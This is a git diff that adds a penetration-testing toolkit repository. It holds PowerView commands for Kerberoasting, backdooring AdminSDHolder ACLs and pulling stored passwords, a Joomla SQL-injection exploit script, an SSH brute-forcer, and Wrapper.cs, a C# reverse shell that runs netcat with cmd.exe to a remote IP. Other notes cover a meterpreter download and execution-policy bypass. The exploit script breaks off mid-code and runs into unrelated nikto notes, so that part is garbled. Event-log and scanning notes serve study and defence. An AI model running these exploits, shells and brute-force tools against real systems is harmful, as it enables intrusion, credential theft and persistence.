diff --git a/PayloadsAllTheThings b/PayloadsAllTheThings new file mode 160000 index 0000000..975a23a --- /dev/null +++ b/PayloadsAllTheThings @@ -0,0 +1 @@ +Subproject commit 975a23ae3487a57c9919a8386cf1d1a2049aa631 diff --git a/PowerSploit b/PowerSploit new file mode 160000 index 0000000..d943001 --- /dev/null +++ b/PowerSploit @@ -0,0 +1 @@ +Subproject commit d943001a7defb5e0d1657085a77a0e78609be58f diff --git a/active_directory/powerview.ps1 b/active_directory/powerview.ps1 new file mode 100644 index 0000000..1bf751a --- /dev/null +++ b/active_directory/powerview.ps1 @@ -0,0 +1,207 @@ +# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ +# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c + +# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: +# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 + +# New function naming schema: +# Verbs: +# Get : retrieve full raw data sets +# Find : ‘find’ specific data entries in a data set +# Add : add a new object to a destination +# Set : modify a given object +# Invoke : lazy catch-all +# Nouns: +# Verb-Domain* : indicates that LDAP/.NET querying methods are being executed +# Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration +# Verb-Net* : indicates that Win32 API access is being used under the hood + + +# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups +Get-DomainGroup -MemberIdentity + +# get all the effective members of a group, 'recursing down' +Get-DomainGroupMember -Identity "Domain Admins" -Recurse + +# use an alterate creadential for any function +$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUser -Credential $Cred + +# retrieve all the computer dns host names a GPP password applies to +Get-DomainOU -GPLink '' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname} + +# get all users with passwords changed > 1 year ago, returning sam account names and password last set times +$Date = (Get-Date).AddYears(-1).ToFileTime() +Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset + +# all enabled users, returning distinguishednames +Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname +Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname + +# all disabled users +Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)" +Get-DomainUser -UACFilter ACCOUNTDISABLE + +# all users that require smart card authentication +Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)" +Get-DomainUser -UACFilter SMARTCARD_REQUIRED + +# all users that *don't* require smart card authentication, only returning sam account names +Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname +Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname + +# use multiple identity types for any *-Domain* function +'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff + +# find all users with an SPN set (likely service accounts) +Get-DomainUser -SPN + +# check for users who don't have kerberos preauthentication set +Get-DomainUser -PreauthNotRequired +Get-DomainUser -UACFilter DONT_REQ_PREAUTH + +# find all service accounts in "Domain Admins" +Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'} + +# find users with sidHistory set +Get-DomainUser -LDAPFilter '(sidHistory=*)' + +# find any users/computers with constrained delegation st +Get-DomainUser -TrustedToAuth +Get-DomainComputer -TrustedToAuth + +# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation +$Computers = Get-DomainComputer -Unconstrained +$Users = Get-DomainUser -AllowDelegation -AdminCount + +# return the local *groups* of a remote server +Get-NetLocalGroup SERVER.domain.local + +# return the local group *members* of a remote server using Win32 API methods (faster but less info) +Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local + +# Kerberoast any users in a particular OU with SPNs set +Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" + +# Find-DomainUserLocation == old Invoke-UserHunter +# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in +Find-DomainUserLocation -ComputerUnconstrained -ShowAll + +# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation +Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation + +# find all computers in a given OU +Get-DomainComputer -SearchBase "ldap://OU=..." + +# Get the logged on users for all machines in any *server* OU in a particular domain +Get-DomainOU -Identity *server* -Domain | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}} + +# enumerate all gobal catalogs in the forest +Get-ForestGlobalCatalog + +# turn a list of computer short names to FQDNs, using a global catalog +gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname} + +# enumerate the current domain controller policy +$DCPolicy = Get-DomainPolicy -Policy DC +$DCPolicy.PrivilegeRights # user privilege rights on the dc... + +# enumerate the current domain policy +$DomainPolicy = Get-DomainPolicy -Policy Domain +$DomainPolicy.KerberosPolicy # useful for golden tickets ;) +$DomainPolicy.SystemAccess # password age/etc. + +# enumerate what machines that a particular user/group identity has local admin rights to +# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation +Get-DomainGPOUserLocalGroupMapping -Identity + +# enumerate what machines that a given user in the specified domain has RDP access rights to +Get-DomainGPOUserLocalGroupMapping -Identity -Domain -LocalGroup RDP + +# export a csv of all GPO mappings +Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv + +# use alternate credentials for searching for files on the domain +# Find-InterestingDomainShareFile == old Invoke-FileFinder +$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force +$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password) +Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential + +# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names +Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local + +# grant user 'will' the rights to change 'matt's password +Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose + +# audit the permissions of AdminSDHolder, resolving GUIDs +Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs + +# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse +Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All + +# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) +Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { + ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') +} + +# find linked DA accounts using name correlation +Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname} + +# save a PowerView object to disk for later usage +Get-DomainUser | Export-Clixml user.xml +$Users = Import-Clixml user.xml + +# Find any machine accounts in privileged groups +Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} + +# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights +Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} + +# find all policies applied to a current machine +Get-DomainGPO -ComputerIdentity windows1.testlab.local + +# enumerate all groups in a domain that don't have a global scope, returning just group names +Get-DomainGroup -GroupScope NotGlobal -Properties name + +# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships +# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames +$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname +$Domains = @{} +$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) { + # extract the domain the foreign user was added to + $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + # check if we've already enumerated this domain + if (-not $Domains[$ForeignUserDomain]) { + $Domains[$ForeignUserDomain] = $True + # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set + $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))" + Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member + } +} +$ForeignMemberships | fl + +# if running in -sta mode, impersonate another credential a la "runas /netonly" +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Invoke-UserImpersonation -Credential $Cred +# ... action +Invoke-RevertToSelf + +# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer +Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier + +# set the specified property for the given user identity +Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose + +# Set the owner of 'dfm' in the current domain to 'harmj0y' +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y + +# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) +Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { + ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') +} + +# check if any user passwords are set +$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl + diff --git a/antivirus_evasion.md b/antivirus_evasion.md new file mode 100644 index 0000000..fe7a10a --- /dev/null +++ b/antivirus_evasion.md @@ -0,0 +1,17 @@ +# Antivirus Evasion + +* Existing types + * On-Disk evasion + * In-Memory evasion + +* Detection Methods + * Static Detection -- Hash or String/Byte Matching + * Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox + + +## Links +* [cmnatic](https://cmnatic.co.uk/) +* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/) + + + diff --git a/enumeration/Checklists b/enumeration/Checklists new file mode 160000 index 0000000..5fc1c93 --- /dev/null +++ b/enumeration/Checklists @@ -0,0 +1 @@ +Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60 diff --git a/enumeration/PSTools.zip b/enumeration/PSTools.zip new file mode 100644 index 0000000..67e87c7 Binary files /dev/null and b/enumeration/PSTools.zip differ diff --git a/enumeration/docs/gobuster.md b/enumeration/docs/gobuster.md new file mode 100644 index 0000000..23631ac --- /dev/null +++ b/enumeration/docs/gobuster.md @@ -0,0 +1,48 @@ +# Gobuster + +[Repo](https://github.com/OJ/gobuster.git) + +### Directories +```sh +gobuster dir -u -w +``` + +### DNS +```sh +gobuster dns -d -w --show-cname --show-ips --resolver +``` + +### Vhosts +* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt` +```sh +gobuster vhost -u -w +``` + + +### FileExtension +```sh +-x +``` +* Fuzz for files and file extensions +```sh +gobuster dir -u -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js +``` + +### Basic Auth +```sh +gobuster help dir +``` +* `--username` and `--password` + +* `dir -s` Accept HTTP Status +* `dir -k` Skip TLS Auth +* `dir -a` User Agent + +### Wordlists +```sh +/usr/share/seclists/Discovery/Web-Content/common.txt +/usr/share/seclists/Discovery/Web-Content/big.txt +/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt +/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt +/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt +``` diff --git a/enumeration/docs/nmap.md b/enumeration/docs/nmap.md new file mode 100644 index 0000000..b15bdbc --- /dev/null +++ b/enumeration/docs/nmap.md @@ -0,0 +1,17 @@ +# nmap + +# Usage + +```sh +nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit +``` +```sh +nmap -oA nmap-vuln -Pn -script vuln -p +``` + +## combo with searchsploit +* nmap-full scan +```sh +sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit +searchsploit --nmap ./nmap-full.xml --verbose +``` diff --git a/enumeration/docs/wpscan.md b/enumeration/docs/wpscan.md new file mode 100644 index 0000000..16ebfd0 --- /dev/null +++ b/enumeration/docs/wpscan.md @@ -0,0 +1,35 @@ +# WPScan + +## Themes +```sh +wpscan --url --enumerate t +``` + +* `ls` for content + +## Plugins +```sh +wpscan --url --enumerate p +``` + +## Users +```sh +wpscan --url --enumerate u +``` + +## Vulnerabilities +* WPVulnDB API is needed +* Plugins +```sh +wpscan --url --enumerate vp +``` + +## Password attack +```sh +wpscan --url --passwords --usernames +``` + +## WAF Aggressiveness +```sh +wpscan --url --enumerate p --plugins-detection + diff --git a/enumeration/gobuster b/enumeration/gobuster new file mode 160000 index 0000000..f7bc132 --- /dev/null +++ b/enumeration/gobuster @@ -0,0 +1 @@ +Subproject commit f7bc13252b4da5d13b2e9d93295da28a1f612125 diff --git a/enumeration/joomblah.py b/enumeration/joomblah.py new file mode 100755 index 0000000..b6793e6 --- /dev/null +++ b/enumeration/joomblah.py @@ -0,0 +1,186 @@ +#!/usr/bin/python3 +import requests +import sys +import re +import argparse +import os +import random +import time +import binascii + + +def extract_token(resp): + match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S) + if match is None: + print(" [!] Cannot find CSRF token") + return None + return match.group(1) + + +def parse_options(): + parser = argparse.ArgumentParser(description='Jooma Exploit') + parser.add_argument('url', help='Base URL for Joomla site') + return parser.parse_args() + + +def build_sqli(colname, morequery): + return "(SELECT " + colname + " " + morequery + ")" + +def joomla_370_sqli_extract(options, sess, token, colname, morequery): + sqli = build_sqli("LENGTH("+colname+")", morequery) + length = joomla_370_sqli(options, sess, token, sqli) + if not length: + return None + length = int(length) + maxbytes = 30 + offset = 0 + result = '' + while length > offset: + sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery) + value = joomla_370_sqli(options, sess, token, sqli) + if not value: + print(" [!] Failed to retrieve string for query:", sqli) + return None + value = binascii.unhexlify(value) + result += value + offset += len(value) + return result + + +def joomla_370_sqli(options, sess, token, sqli): + sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)" + data = { + 'option': 'com_fields', + 'view': 'fields', + 'layout': 'modal', + 'list[fullordering]': sqli_full, + token: '1', + } + resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False) + match = re.search(r'XPATH syntax error:\s*'([^$\n]+)\s*'\s*: -h http://example.com:1234/manager/html +``` +## Plugins +```sh +nikto -h http://example.com -Plugins apacheusers +``` + +* List all plugins +```sh +nikto -list-plugins +``` + + diff --git a/enumeration/nmap-full.gnmap b/enumeration/nmap-full.gnmap new file mode 100644 index 0000000..c7edec2 --- /dev/null +++ b/enumeration/nmap-full.gnmap @@ -0,0 +1,4 @@ +# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 +Host: 10.10.156.247 () Status: Up +Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp///// +# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds diff --git a/enumeration/nmap-full.nmap b/enumeration/nmap-full.nmap new file mode 100644 index 0000000..7ffc626 --- /dev/null +++ b/enumeration/nmap-full.nmap @@ -0,0 +1,19 @@ +# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 +Nmap scan report for 10.10.156.247 +Host is up (0.064s latency). +Not shown: 64293 closed ports, 1231 filtered ports +Some closed ports may be reported as filtered due to --defeat-rst-ratelimit +PORT STATE SERVICE +135/tcp open msrpc +139/tcp open netbios-ssn +445/tcp open microsoft-ds +3389/tcp open ms-wbt-server +31337/tcp open Elite +49152/tcp open unknown +49153/tcp open unknown +49154/tcp open unknown +49155/tcp open unknown +49161/tcp open unknown +49162/tcp open unknown + +# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds diff --git a/enumeration/nmap-full.xml b/enumeration/nmap-full.xml new file mode 100644 index 0000000..40c82ff --- /dev/null +++ b/enumeration/nmap-full.xml @@ -0,0 +1,35 @@ + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/enumeration/shodan.md b/enumeration/shodan.md new file mode 100644 index 0000000..22e3dfb --- /dev/null +++ b/enumeration/shodan.md @@ -0,0 +1,31 @@ +# Shodan + +## Checking found Autonomous System Number (ASN) +* Shodan does output ASN, not necessarily the IP of a small company. Search for +```h +asn:AS13335 +``` +* [ASN Check](https://dnschecker.org/asn-whois-lookup.php) + +## Banner +* Example +```json +{ + "data": "Moxa Nport Device", + "Status": "Authentication disabled", + "Name": "NP5232I_4728", + "MAC": "00:90:e8:47:10:2d", + "ip_str": "46.252.132.235", + "port": 4800, + "org": "Starhub Mobile", + "location": { + "country_code": "SG" + } + } +``` + +## Filter +* vulns +```sh +vuln:ms17-010 +``` diff --git a/enumeration/ssh_brute_force.py b/enumeration/ssh_brute_force.py new file mode 100755 index 0000000..7971fd3 --- /dev/null +++ b/enumeration/ssh_brute_force.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python + +import paramiko +import sys +import os + +target = str(input("IP address: ")) +username = str(input("Username: ")) +password_file = str(input("Location of password file: ")) + +def ssh_connect(password, code=0): + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + + try: + ssh.connect(target, port=22, username=username, password=password) + except paramiko.AuthenticationException: + code = 1 + ssh.close() + return code + +with open(password_file, 'rb') as _f: + for line in _f.readlines(): + password = line.strip() + print(password) + try: + response = ssh_connect(password) + + if response == 0 : + print("[+] Password Found: " + password.decode()) + exit(0) + if response == 1: + print("[-] Nothing Found") + except Exception as e: + print(e) + pass + + diff --git a/enumeration/windows/Windows-Exploit-Suggester-python3 b/enumeration/windows/Windows-Exploit-Suggester-python3 new file mode 160000 index 0000000..3670e5d --- /dev/null +++ b/enumeration/windows/Windows-Exploit-Suggester-python3 @@ -0,0 +1 @@ +Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a diff --git a/enumeration/windows/Wrapper.cs b/enumeration/windows/Wrapper.cs new file mode 100644 index 0000000..72f78a3 --- /dev/null +++ b/enumeration/windows/Wrapper.cs @@ -0,0 +1,13 @@ +using System; +using System.Diagnostics; + +namespace Wrapper { + class Program { + static void Main (){ + Process proc = new Process(); + ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe"); + proc.StartInfo = procInfo; + proc.Start(); + } + } +} diff --git a/enumeration/windows/event_log.md b/enumeration/windows/event_log.md new file mode 100644 index 0000000..0a84d0d --- /dev/null +++ b/enumeration/windows/event_log.md @@ -0,0 +1,93 @@ +# Logging +* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf) +* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm) +* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor) +* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630) + +## Loglevel +|ID|Event Type|Description| +|--|----------|-----------| +|0|Error|An event that indicates a significant problem.| +|1|Warning|An event that is not necessarily significant.| +|2|Information|An event describing the successful operation of an application.| +|3|Success Audit|An event that records an audited security access attempt that is successful.| +|4|Failure Audit|An event that records an audited security access attempt that is failure.| + +## Logrotation +```sh +C:\Windows\System32\winevt\Logs +``` +* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties. + + +## Tools + +* Event Viewer (GUI-based application) +* Wevtutil.exe (command-line tool) +* Get-WinEvent (PowerShell cmdlet) + +### wevtutil.exe +```sh +wevtutil.exe /? +``` +* Count logs +```sh +wevtutil.exe le | measure +``` +* Read three most recent Application logs +```sh +wevtutil qe Application /c:3 /rd:true /f:text +``` + +### Get-WinEvent +* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1) +* List all the logs +```sh +Get-WinEvent -ListLog * +``` +* Find string +```sh + Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' } +``` +* Further filtering +```sh +Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' } +``` +```sh +Get-WinEvent -ListProvider *Policy* +``` +```sh +(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description +``` +* Filter by hashtable values +```sh +Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' }; +``` +```sh +Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString' +``` +* Including __XPATH__ +```sh +Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]' +``` +```sh +Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"' +``` +```sh + Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1 +``` +* Find login by username +```sh +Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"' +``` + +### Command Line Logging +* Enable PS Logging +```sh +Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell +``` +* CLI Process Auditing -- ID 4688 +``` +Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation +``` + diff --git a/enumeration/windows/manual_enum.md b/enumeration/windows/manual_enum.md new file mode 100644 index 0000000..9be1d87 --- /dev/null +++ b/enumeration/windows/manual_enum.md @@ -0,0 +1,18 @@ +# Manual Windows Enumeration + +* `whoami /priv` +* `whoami /groups` +* Looking for non-default services: +```sh +wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows" +``` + * **Unquoted Service Path** Ideally there is a path without quotation + * Check which account the service the services run as + ```sh + sc qc + ``` +* Check if directory is writeable +```sh +powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list" +``` + diff --git a/enumeration/windows/powershell.md b/enumeration/windows/powershell.md new file mode 100644 index 0000000..e801899 --- /dev/null +++ b/enumeration/windows/powershell.md @@ -0,0 +1,238 @@ +# Powershell Usage + +## Get-Help +``` +Get-Help Command-Name +``` +* Show examples +``` +Get-Help Command-Name -Examples +``` + +* Get-Command gets all the cmdlets installed on the current Computer. +``` +Get-Command +``` +``` +Get-Command Verb-* +Get-Command Invoke-* +Get-Command Get-* +``` + +## Passing Output via Pipe +* A pipe passes object including methods and attributes. + +``` +Verb-Noun | Get-Member +``` +``` +Get-Command | Get-Member -MemberType Method +``` + +## Creating Objects from Previous Cmdlets +``` +Get-ChildItem | Select-Object -Property Mode, Name +``` +* first - gets the first x object +* last - gets the last x object +* unique - shows the unique objects +* skip - skips x objects + +## Filtering Objects +``` +Verb-Noun | Where-Object -Property PropertyName -operator Value +Verb-Noun | Where-Object {$_.PropertyName -operator Value} +``` +The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet. +* Where -operator is a list of the following operators: + +* -Contains: if any item in the property value is an exact match for the specified value +* -EQ: if the property value is the same as the specified value +* -GT: if the property value is greater than the specified value + +## Sort Object +``` +Verb-Noun | Sort-Object +``` +``` +Get-ChildItem | Sort-Object +``` + +## Finding a File +``` +Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'} +``` +```sh +Get-HotFix | Format-list | findstr +``` + +## Showing File Content +``` +Get-Content 'C:\Program Files\interesting-file.txt' +``` + +## Copy File Content +```sh +Copy-Item +``` + +## Count Lines of Output +As an example, count all cmdlets on the system +``` +Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object +``` + +## Checksum of File +``` +Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt' +``` + +## Current Working Directory +``` +Get-Location +``` + +## File Metadata +```sh +ls | Format-List * +``` + +## Web Request +```sh +Invoke-Webrequest -Uri 'http:// -OutFile +``` +```sh +(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1') +``` + +## Base64 Decode File +``` +[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt))) +``` + +## **Circumvent Execution-Policy** +```sh +powershell -ExecutionPolicy Bypass -File .\ +``` +```sh +Set-ExecutionPolicy Bypass -Scope Process +``` + +## Enumeration + +### Users +``` +Get-LocalUser +``` + +* Password not required users +``` +Get-LocalUser | Where-Object -Property PasswordRequired -Match false +``` + +* SID of users +``` +Get-WmiObject win32_useraccount | Select name, sid +``` + +### Network intel +* IP Address +``` +Get-NetIpAddress +``` + +* Listening TCP Ports +``` +Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure +``` + +* TCP Port by number +``` +Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443 +``` + +### Patch level and updates +``` +Get-Hotfix +``` +* Find patch by HotFixID +``` +Get-Hotfix | Where-Object -Property HotFixID -Match KB124284 +``` + +### Find files and Content +* Find backup files +``` +Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue +``` + +* Find file contents +``` +Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY +``` + +### Processes +* Start processes +```sh +Start-Process +``` + +* Running processes +```sh +Get-Process +``` +* Scheduled Tasks, by TaskName +``` +Get-ScheduledTask | Where-Object -Property TaskName -Match taskname +``` +or +``` +Get-ScheduledTask -TaskName taskname +``` + +### Export Output +* Export as CSV +```sh +Get-Process | Export-Csv +``` + +### ACL +* Owner of files +``` +Get-ACL C:\ +``` + +### Port Scanner +``` +for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i} +``` + +### Ping Hosts +```sh +1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl} +``` + +### Using Powerview +```sh +Import-Module .\powerview.ps1 +Get-NetDomainController +(Get-NetUser).name +Get-NetUser -properties description +Get-NetUser | select -ExpandProperty lastlogon +Get-NetComputer -ping +Get-NetGroupMember "Domain Admins" +Find-DomainShare -CheckShareAccess +``` +* Enumerate Group Policy +```sh +Get-NetGPO +``` +* Trust relationship to other domains +```sh +Get-NetDomainTrust +``` +* User enumeration +```sh +Find-LocalAdminAccess +``` + diff --git a/enumeration/windows/sysinternals.md b/enumeration/windows/sysinternals.md new file mode 100644 index 0000000..c08734d --- /dev/null +++ b/enumeration/windows/sysinternals.md @@ -0,0 +1,97 @@ +# Sysinternals and CLI usage + +## Opening System Properties +``` +sysdm.cpl +``` + +## Installing webdav server, + +* Starting windows webclient service +``` +get-service webclient +start-service webclient +``` + +* Opening NetworkAndSharingCenter +``` +control.exe /name Microsoft.NetworkAndSharingCenter +``` +## Make sure Network Discovery is enabled, advanced settings! + +``` +Install-WindowsFeature WebDAV-Redirector –Restart +Get-WindowsFeature WebDAV-Redirector | Format-Table –Autosize +``` + +## Sigcheck +Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a file’s status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning. + +* Check for unsigned files in `C:\Windows\system32` +``` +sigcheck -u -e C:\Windows\System32 +``` +* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files." +* `-e` "Scan executable images only (regardless of their extension)" + +## Alternate Data Stream (ADS) +By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition) +``` +streams file.txt + +notepad file.txt: +or +Get-Content -Path .\file.txt -stream ads.txt +``` + +## SDelete +SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk. + + +## TCPView +TCPView provides 